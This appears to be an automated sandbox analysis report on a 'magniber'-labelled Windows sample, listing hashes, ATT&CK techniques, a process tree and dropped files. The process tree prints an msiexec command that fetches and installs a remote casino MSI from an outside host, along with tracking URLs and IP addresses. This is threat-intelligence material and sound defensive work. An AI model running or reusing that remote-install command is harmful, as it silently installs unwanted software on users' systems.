b07dff04a443198ad92fef579b82718900f7ee9725c4d909957f117ef97900a0

General

Target

2024-08-17_01e497e2a93d7f686ac0637cef4b6fd6_magniber.exe
Size

1.4MB
MD5

01e497e2a93d7f686ac0637cef4b6fd6
SHA1

1147e234052aaffb42830476cb2e10d8ea3ca9e5
SHA256

b07dff04a443198ad92fef579b82718900f7ee9725c4d909957f117ef97900a0
SHA512

f6039faaf2783f52fd6ad770701b33e9ccbadfb83fa9082ed303ba2da5303a2c1966f3de6f3729a86ecfebbfc3305093a7a92c023673227a1b477817a5299367
SSDEEP

24576:YaQAIY3crTKU1fsLR9j7XBghxKFxOtwwl9JdSiNrk3SLdhInbqN+F7C5t0c++M1:YaUYsrxUN9j7RVxOtbvHzNO6feqN+RCm

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2316	~nqosb3nfts.tmp

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
2044	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-17_01e497e2a93d7f686ac0637cef4b6fd6_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~nqosb3nfts.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2044	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	2044	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2044	MSIEXEC.EXE
2044	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 2316	1924	2024-08-17_01e497e2a93d7f686ac0637cef4b6fd6_magniber.exe	91
PID 1924 wrote to memory of 2316	1924	2024-08-17_01e497e2a93d7f686ac0637cef4b6fd6_magniber.exe	91
PID 1924 wrote to memory of 2316	1924	2024-08-17_01e497e2a93d7f686ac0637cef4b6fd6_magniber.exe	91
PID 2316 wrote to memory of 2044	2316	~nqosb3nfts.tmp	100
PID 2316 wrote to memory of 2044	2316	~nqosb3nfts.tmp	100
PID 2316 wrote to memory of 2044	2316	~nqosb3nfts.tmp	100

C:\Users\Admin\AppData\Local\Temp\2024-08-17_01e497e2a93d7f686ac0637cef4b6fd6_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-17_01e497e2a93d7f686ac0637cef4b6fd6_magniber.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Users\Admin\AppData\Local\Temp\~nqosb3nfts.tmp
  "C:\Users\Admin\AppData\Local\Temp\~nqosb3nfts.tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2316
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://clatz.fileslldl.eu/client/pkgs/winpalaceeuro/Win Palace Euro Casino20140907090248.msi" DDC_DID=2787065 DDC_RTGURL=http://www.filecdn.eu/dl/TrackSetup/TrackSetup.aspx?DID=2787065%26filename=WinPalaceEuro%2Eexe%26CASINONAME=winpalaceeuro DDC_DOWNLOAD_AFFID=45572 DDC_UPDATESTATUSURL=http://190.4.91.3:8080/wpalaceu/Lobby.WebServices/Installer.asmx CUSTOMNAME02=redirectAsData CUSTOMVALUE02=1 CUSTOMNAME03=remoteIP CUSTOMVALUE03=87.245.197.196 CUSTOMNAME04=name CUSTOMNAME05=email CUSTOMNAME06=redirect CUSTOMNAME07=version CUSTOMVALUE07=100 CUSTOMNAME08=camefrom CUSTOMVALUE08=http://www.winpalace.im/en/promotions/.aspx CUSTOMNAME09=adid CUSTOMVALUE09=NULL CUSTOMNAME10=affreferrer CUSTOMVALUE10=http://www.winpalace.im/en/promotions/.aspx SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~nqosb3nfts.tmp"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:2044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3364,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=4632 /prefetch:8
1⤵
PID:4940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is68CC.tmp

Filesize
1KB

MD5
6cf7204dff3e85f03e39e59da1df9ca1

SHA1
fdcc44e914e2750e43da492a31b2baa19fbea491

SHA256
80e1f8a9f95d3e29ee83cc02a3f4859a5692a8f2a03d93c796272387fa23560f

SHA512
aa52cb53475f1b497373ac02d93b13d28340cbdf98413f35cbfb792776628360458dfefc122ed026380eb5582ebf888c85d78707e3c02a2b0f3c2def23223a10

Download Submit
C:\Users\Admin\AppData\Local\Temp\{77BC4A7D-A949-49E8-B170-2F799358123E}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{77BC4A7D-A949-49E8-B170-2F799358123E}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~68AA.tmp

Filesize
6KB

MD5
e06c5f7e16d86841198005000da8c56e

SHA1
515ebd2129b7ebcaac3eb3b1b1699cf9cd889d02

SHA256
0b336cf709ce3f5865871647c3852a07dfc0e035e05fb027b46940c2211d5b40

SHA512
504d81c1cc6b19499468665e3848693c8d970dfc3290256f28703ae62a3cddcb8a8c6602365901e5b08c13929777022f8a6fda0451a3c9f0ad591fef502ecb52

Download Submit
C:\Users\Admin\AppData\Local\Temp\~nqosb3nfts.tmp

Filesize
1.2MB

MD5
95455dcdc1e95474ab1e8d2f81f9e99c

SHA1
3de4bffaecaa432fae73138518d33e6427b8a934

SHA256
835161be82807a1e18bd5f4a065a631520a07d588c307b72d0d048af13df5789

SHA512
6bf18b907d0a79e3f1fb0b5a879f9ff51106155a7ac6ade79a7c7dcf56dc1e3a58efdbaae57d6221b72f0028bde169b5bf3476c68835ff4e8427b8014c58dcfb

Download Submit

Analysis

Sharing